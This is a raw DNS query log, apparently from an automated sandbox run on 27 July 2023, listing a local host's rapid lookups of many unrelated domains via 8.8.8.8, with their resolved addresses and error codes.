                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:01.881429911 CEST8.8.8.8192.168.2.40x693cNo error (0)bd-style.com103.112.69.92A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:01.983612061 CEST8.8.8.8192.168.2.40x26a1No error (0)t-trust.jp183.181.82.14A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:02.013472080 CEST8.8.8.8192.168.2.40x54c2Server failure (2)amele.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:02.026488066 CEST8.8.8.8192.168.2.40xfbbaNo error (0)shiner.com188.114.97.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:02.026488066 CEST8.8.8.8192.168.2.40xfbbaNo error (0)shiner.com188.114.96.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:02.406065941 CEST8.8.8.8192.168.2.40xe84bServer failure (2)awfraser.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:02.478380919 CEST8.8.8.8192.168.2.40x5e0dNo error (0)vvsteknik.dk185.31.76.90A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:02.739326000 CEST8.8.8.8192.168.2.40x50a8No error (0)atb-lit.com208.100.26.245A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:03.313716888 CEST8.8.8.8192.168.2.40x8388Server failure (2)awfraser.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:03.806905985 CEST8.8.8.8192.168.2.40xb36dNo error (0)tozzhin.com202.94.166.30A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:03.930795908 CEST8.8.8.8192.168.2.40x91c0No error (0)linac.co.uk23.236.62.147A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:04.086824894 CEST8.8.8.8192.168.2.40x2cd9No error (0)orlyhotel.com172.67.156.49A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:04.086824894 CEST8.8.8.8192.168.2.40x2cd9No error (0)orlyhotel.com104.21.48.207A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:04.728817940 CEST8.8.8.8192.168.2.40xf794No error (0)johnlyon.org141.193.213.20A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:05.491653919 CEST8.8.8.8192.168.2.40x8cNo error (0)xinhui.net43.255.29.192A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:05.881242990 CEST8.8.8.8192.168.2.40xb257No error (0)kallman.net185.76.64.25A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:05.887757063 CEST8.8.8.8192.168.2.40x51eeServer failure (2)clysma.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:06.146817923 CEST8.8.8.8192.168.2.40x5329No error (0)gujarat.com104.21.73.143A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:06.146817923 CEST8.8.8.8192.168.2.40x5329No error (0)gujarat.com172.67.145.148A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:06.212801933 CEST8.8.8.8192.168.2.40xb084No error (0)absblast.com141.193.213.20A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:06.424911022 CEST8.8.8.8192.168.2.40xddf8Server failure (2)awfraser.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:06.626152039 CEST8.8.8.8192.168.2.40xfb74No error (0)mondopp.net173.231.184.124A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:06.708085060 CEST8.8.8.8192.168.2.40xda45No error (0)mkm-gr.com79.124.76.247A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:06.878029108 CEST8.8.8.8192.168.2.40xa071Server failure (2)awfraser.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:07.328247070 CEST8.8.8.8192.168.2.40x51eeServer failure (2)clysma.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:07.396089077 CEST8.8.8.8192.168.2.40x749No error (0)mijash3.com198.185.159.144A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:07.396089077 CEST8.8.8.8192.168.2.40x749No error (0)mijash3.com198.185.159.145A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:07.396089077 CEST8.8.8.8192.168.2.40x749No error (0)mijash3.com198.49.23.145A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:07.396089077 CEST8.8.8.8192.168.2.40x749No error (0)mijash3.com198.49.23.144A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:07.406646967 CEST8.8.8.8192.168.2.40x931eNo error (0)agulatex.com133.125.38.187A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:07.543432951 CEST8.8.8.8192.168.2.40xbdceNo error (0)dwid.de87.230.93.218A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:07.576045036 CEST8.8.8.8192.168.2.40x3ba2No error (0)host.do217.79.248.38A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:07.593426943 CEST8.8.8.8192.168.2.40x4714No error (0)kairel.com54.217.118.81A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:07.595478058 CEST8.8.8.8192.168.2.40xcff2Name error (3)amba-tc.sinonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:07.643096924 CEST8.8.8.8192.168.2.40xddf8Server failure (2)awfraser.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:07.647505999 CEST8.8.8.8192.168.2.40xcc13No error (0)atb-lit.com208.100.26.245A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:07.805175066 CEST8.8.8.8192.168.2.40x5876No error (0)unicus.jp49.212.232.113A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:07.861648083 CEST8.8.8.8192.168.2.40xc8a3No error (0)midap.com198.49.23.144A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:07.861648083 CEST8.8.8.8192.168.2.40xc8a3No error (0)midap.com198.185.159.144A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:07.861648083 CEST8.8.8.8192.168.2.40xc8a3No error (0)midap.com198.185.159.145A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:07.861648083 CEST8.8.8.8192.168.2.40xc8a3No error (0)midap.com198.49.23.145A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:07.891580105 CEST8.8.8.8192.168.2.40x8c86No error (0)bggs.com35.230.155.43A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:07.896173954 CEST8.8.8.8192.168.2.40xa782No error (0)deckoviny.cz88.86.118.82A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:07.932308912 CEST8.8.8.8192.168.2.40xbf51No error (0)t-trust.jp183.181.82.14A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:07.936316013 CEST8.8.8.8192.168.2.40x15f6No error (0)sgk.home.pl89.161.136.188A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:07.957457066 CEST8.8.8.8192.168.2.40x4fffNo error (0)slower.it127.0.0.11A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:07.995918989 CEST8.8.8.8192.168.2.40xdc50No error (0)ludea.cz46.8.8.200A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:08.197009087 CEST8.8.8.8192.168.2.40x3c8cNo error (0)rokoron.com211.13.204.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:08.220765114 CEST8.8.8.8192.168.2.40xdcd3No error (0)host.do217.79.248.38A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:08.231988907 CEST8.8.8.8192.168.2.40x8c56No error (0)gphpedit.org127.0.0.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:08.266479969 CEST8.8.8.8192.168.2.40xb701No error (0)any-s.net108.170.12.50A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:08.354583979 CEST8.8.8.8192.168.2.40x967dName error (3)haigh-me.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:08.405570030 CEST8.8.8.8192.168.2.40x886eNo error (0)zemarmot.net164.132.175.106A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:08.411412954 CEST8.8.8.8192.168.2.40xcd8dNo error (0)sokuwan.net185.230.63.107A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:08.411412954 CEST8.8.8.8192.168.2.40xcd8dNo error (0)sokuwan.net185.230.63.171A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:08.411412954 CEST8.8.8.8192.168.2.40xcd8dNo error (0)sokuwan.net185.230.63.186A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:08.454777956 CEST8.8.8.8192.168.2.40x43a9No error (0)awal.ws127.0.0.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:08.539566040 CEST8.8.8.8192.168.2.40x51eeServer failure (2)clysma.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:08.591984987 CEST8.8.8.8192.168.2.40xa93bNo error (0)gbp-jp.com208.80.123.104A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:08.591984987 CEST8.8.8.8192.168.2.40xa93bNo error (0)gbp-jp.com208.80.123.195A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:08.591984987 CEST8.8.8.8192.168.2.40xa93bNo error (0)gbp-jp.com208.80.122.2A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:08.591984987 CEST8.8.8.8192.168.2.40xa93bNo error (0)gbp-jp.com208.80.122.205A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:08.595961094 CEST8.8.8.8192.168.2.40x2b8fNo error (0)dzm.cz83.167.255.150A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:08.645147085 CEST8.8.8.8192.168.2.40x65acNo error (0)smitko.net31.15.12.103A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:08.678359032 CEST8.8.8.8192.168.2.40xddf8Server failure (2)awfraser.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:08.765012026 CEST8.8.8.8192.168.2.40x1144No error (0)refintl.org198.185.159.145A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:08.765012026 CEST8.8.8.8192.168.2.40x1144No error (0)refintl.org198.185.159.144A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:08.765012026 CEST8.8.8.8192.168.2.40x1144No error (0)refintl.org198.49.23.145A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:08.765012026 CEST8.8.8.8192.168.2.40x1144No error (0)refintl.org198.49.23.144A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:08.794651985 CEST8.8.8.8192.168.2.40x903bNo error (0)araax.comtraff-6.hugedomains.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:08.794651985 CEST8.8.8.8192.168.2.40x903bNo error (0)traff-6.hugedomains.comhdr-nlb10-d66bbad0736f8259.elb.us-east-2.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:08.794651985 CEST8.8.8.8192.168.2.40x903bNo error (0)hdr-nlb10-d66bbad0736f8259.elb.us-east-2.amazonaws.com18.119.154.66A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:08.794651985 CEST8.8.8.8192.168.2.40x903bNo error (0)hdr-nlb10-d66bbad0736f8259.elb.us-east-2.amazonaws.com3.140.13.188A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:08.806310892 CEST8.8.8.8192.168.2.40x5355No error (0)sanfotek.net216.69.141.67A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:08.895427942 CEST8.8.8.8192.168.2.40x81ffNo error (0)awal.ws127.0.0.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:08.974656105 CEST8.8.8.8192.168.2.40x6df6No error (0)cbras.com54.39.198.18A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:08.981700897 CEST8.8.8.8192.168.2.40xe66bNo error (0)yoruksut.com93.187.206.66A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:09.244440079 CEST8.8.8.8192.168.2.40x7386No error (0)geecl.com194.76.27.77A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:09.327661037 CEST8.8.8.8192.168.2.40x1b35Server failure (2)amele.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:09.389827967 CEST8.8.8.8192.168.2.40xa75cNo error (0)ssm.ch93.189.66.202A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:09.441823006 CEST8.8.8.8192.168.2.40xc0b6No error (0)karmy.com.pl185.253.212.22A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:09.635543108 CEST8.8.8.8192.168.2.40xb183No error (0)ifesnet.com188.114.96.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:09.635543108 CEST8.8.8.8192.168.2.40xb183No error (0)ifesnet.com188.114.97.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:09.658782005 CEST8.8.8.8192.168.2.40x697cNo error (0)infotech.pl79.96.32.254A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:09.729305983 CEST8.8.8.8192.168.2.40x3eedNo error (0)pertex.com185.151.30.147A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:09.760958910 CEST8.8.8.8192.168.2.40x91b3No error (0)oaith.ca192.124.249.12A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:09.955562115 CEST8.8.8.8192.168.2.40x90c4No error (0)rkengg.comtraff-6.hugedomains.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:09.955562115 CEST8.8.8.8192.168.2.40x90c4No error (0)traff-6.hugedomains.comhdr-nlb10-d66bbad0736f8259.elb.us-east-2.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:09.955562115 CEST8.8.8.8192.168.2.40x90c4No error (0)hdr-nlb10-d66bbad0736f8259.elb.us-east-2.amazonaws.com18.119.154.66A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:09.955562115 CEST8.8.8.8192.168.2.40x90c4No error (0)hdr-nlb10-d66bbad0736f8259.elb.us-east-2.amazonaws.com3.140.13.188A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:10.008050919 CEST8.8.8.8192.168.2.40x381fNo error (0)gujarat.com104.21.73.143A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:10.008050919 CEST8.8.8.8192.168.2.40x381fNo error (0)gujarat.com172.67.145.148A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:10.014383078 CEST8.8.8.8192.168.2.40x76f4No error (0)mcseurope.nl46.19.218.80A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:10.164791107 CEST8.8.8.8192.168.2.40x4553No error (0)host.do217.79.248.38A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:10.195580006 CEST8.8.8.8192.168.2.40xdc39No error (0)aba.org.eg192.169.149.78A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:10.410340071 CEST8.8.8.8192.168.2.40x5c5cNo error (0)t-trust.jp183.181.82.14A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:10.516529083 CEST8.8.8.8192.168.2.40xcbbaNo error (0)kamptal.at128.204.134.138A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:10.537044048 CEST8.8.8.8192.168.2.40x3340No error (0)wolffkran.de46.4.56.54A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:10.728844881 CEST8.8.8.8192.168.2.40x843No error (0)epc.com.au103.4.16.43A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:10.733515024 CEST8.8.8.8192.168.2.40x51eeServer failure (2)clysma.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:10.881980896 CEST8.8.8.8192.168.2.40xe10eNo error (0)kallman.net185.76.64.25A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:11.006164074 CEST8.8.8.8192.168.2.40x7ef6No error (0)smitko.net31.15.12.103A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:11.022959948 CEST8.8.8.8192.168.2.40xc7faNo error (0)sinwal.com188.114.97.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:11.022959948 CEST8.8.8.8192.168.2.40xc7faNo error (0)sinwal.com188.114.96.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:11.691793919 CEST8.8.8.8192.168.2.40xfb87No error (0)t-trust.jp183.181.82.14A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:12.075539112 CEST8.8.8.8192.168.2.40x80eNo error (0)dhh.la.gov52.200.51.73A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:12.080216885 CEST8.8.8.8192.168.2.40x33d8No error (0)clinicasanluis.com.co104.21.66.220A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:12.080216885 CEST8.8.8.8192.168.2.40x33d8No error (0)clinicasanluis.com.co172.67.164.178A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:12.086826086 CEST8.8.8.8192.168.2.40x3826No error (0)hyab.se188.114.97.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:12.086826086 CEST8.8.8.8192.168.2.40x3826No error (0)hyab.se188.114.96.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:12.088078022 CEST8.8.8.8192.168.2.40x30afNo error (0)mackusick.com217.160.0.179A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:12.089036942 CEST8.8.8.8192.168.2.40xe075No error (0)magicomm.co.uk83.223.113.46A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:12.097035885 CEST8.8.8.8192.168.2.40x8d24No error (0)sigtoa.com188.114.96.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:12.097035885 CEST8.8.8.8192.168.2.40x8d24No error (0)sigtoa.com188.114.97.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:12.100411892 CEST8.8.8.8192.168.2.40xa06aNo error (0)diamir.de94.130.146.206A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:12.101847887 CEST8.8.8.8192.168.2.40xbafNo error (0)ruzee.com207.180.198.201A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:12.106266975 CEST8.8.8.8192.168.2.40xe397No error (0)flamingorecordings.com35.214.171.193A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:12.113643885 CEST8.8.8.8192.168.2.40xe672No error (0)strazynski.pl85.128.196.22A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:12.304608107 CEST8.8.8.8192.168.2.40x6462No error (0)hchc.org34.224.10.110A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:12.304608107 CEST8.8.8.8192.168.2.40x6462No error (0)hchc.org52.11.37.152A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:12.318402052 CEST8.8.8.8192.168.2.40x8cd3No error (0)nts-web.net49.212.235.175A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:12.391222954 CEST8.8.8.8192.168.2.40x47dfNo error (0)wahw.com.au54.194.190.151A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:12.752737045 CEST8.8.8.8192.168.2.40x42c9No error (0)calvinly.com216.239.32.21A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:12.752737045 CEST8.8.8.8192.168.2.40x42c9No error (0)calvinly.com216.239.36.21A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:12.752737045 CEST8.8.8.8192.168.2.40x42c9No error (0)calvinly.com216.239.38.21A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:12.752737045 CEST8.8.8.8192.168.2.40x42c9No error (0)calvinly.com216.239.34.21A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:12.910450935 CEST8.8.8.8192.168.2.40x3e58No error (0)kewlmail.com63.251.106.25A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:12.985028982 CEST8.8.8.8192.168.2.40x371No error (0)absblast.com141.193.213.20A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:12.989157915 CEST8.8.8.8192.168.2.40x1d34No error (0)ramkome.com62.75.216.107A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:12.997941017 CEST8.8.8.8192.168.2.40x2aa1Name error (3)haigh-me.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:13.025336981 CEST8.8.8.8192.168.2.40x410bNo error (0)insia.com82.208.6.9A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:13.033209085 CEST8.8.8.8192.168.2.40x3516No error (0)dbnet.at188.94.254.88A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:13.153518915 CEST8.8.8.8192.168.2.40x3fNo error (0)indonesiamedia.com74.208.215.145A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:13.805557013 CEST8.8.8.8192.168.2.40x1075No error (0)tbvlugus.nl174.129.25.170A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:13.942408085 CEST8.8.8.8192.168.2.40x3076No error (0)isom.org192.124.249.14A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:14.102215052 CEST8.8.8.8192.168.2.40x6e3fNo error (0)bosado.com5.39.75.157A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:14.123207092 CEST8.8.8.8192.168.2.40x42f0No error (0)websy.com13.248.169.48A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:14.123207092 CEST8.8.8.8192.168.2.40x42f0No error (0)websy.com76.223.54.146A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:14.133315086 CEST8.8.8.8192.168.2.40x6bb5Name error (3)eos-i.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:14.136817932 CEST8.8.8.8192.168.2.40x29caNo error (0)sidepath.com34.193.204.92A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:14.136817932 CEST8.8.8.8192.168.2.40x29caNo error (0)sidepath.com34.193.69.252A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:14.136817932 CEST8.8.8.8192.168.2.40x29caNo error (0)sidepath.com99.83.190.102A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:14.136817932 CEST8.8.8.8192.168.2.40x29caNo error (0)sidepath.com75.2.70.75A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:14.196827888 CEST8.8.8.8192.168.2.40x7044No error (0)s5w.com192.99.226.184A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:14.202795982 CEST8.8.8.8192.168.2.40x286No error (0)slower.it127.0.0.11A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:14.417900085 CEST8.8.8.8192.168.2.40x6f73Name error (3)amba-tc.sinonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:14.574552059 CEST8.8.8.8192.168.2.40xdf26No error (0)shanks.co.uk217.19.254.22A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:14.597912073 CEST8.8.8.8192.168.2.40x46b0No error (0)www.muhr-soehne.de5.189.171.125A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:14.607768059 CEST8.8.8.8192.168.2.40x3898No error (0)techtrans.de185.237.66.112A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:14.661292076 CEST8.8.8.8192.168.2.40x988aNo error (0)anduran.comtraff-6.hugedomains.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:14.661292076 CEST8.8.8.8192.168.2.40x988aNo error (0)traff-6.hugedomains.comhdr-nlb10-d66bbad0736f8259.elb.us-east-2.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:14.661292076 CEST8.8.8.8192.168.2.40x988aNo error (0)hdr-nlb10-d66bbad0736f8259.elb.us-east-2.amazonaws.com3.140.13.188A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:14.661292076 CEST8.8.8.8192.168.2.40x988aNo error (0)hdr-nlb10-d66bbad0736f8259.elb.us-east-2.amazonaws.com18.119.154.66A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:14.886296034 CEST8.8.8.8192.168.2.40x3a6fNo error (0)hubbikes.com75.2.70.75A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:14.886296034 CEST8.8.8.8192.168.2.40x3a6fNo error (0)hubbikes.com99.83.190.102A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:15.019213915 CEST8.8.8.8192.168.2.40xa8cNo error (0)adventist.ro49.12.155.123A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:15.117728949 CEST8.8.8.8192.168.2.40x9e91No error (0)umcor.am188.114.96.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:15.117728949 CEST8.8.8.8192.168.2.40x9e91No error (0)umcor.am188.114.97.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:15.367432117 CEST8.8.8.8192.168.2.40xe682Server failure (2)atis-sk.canonenoneA (IP address)IN (0x0001)false
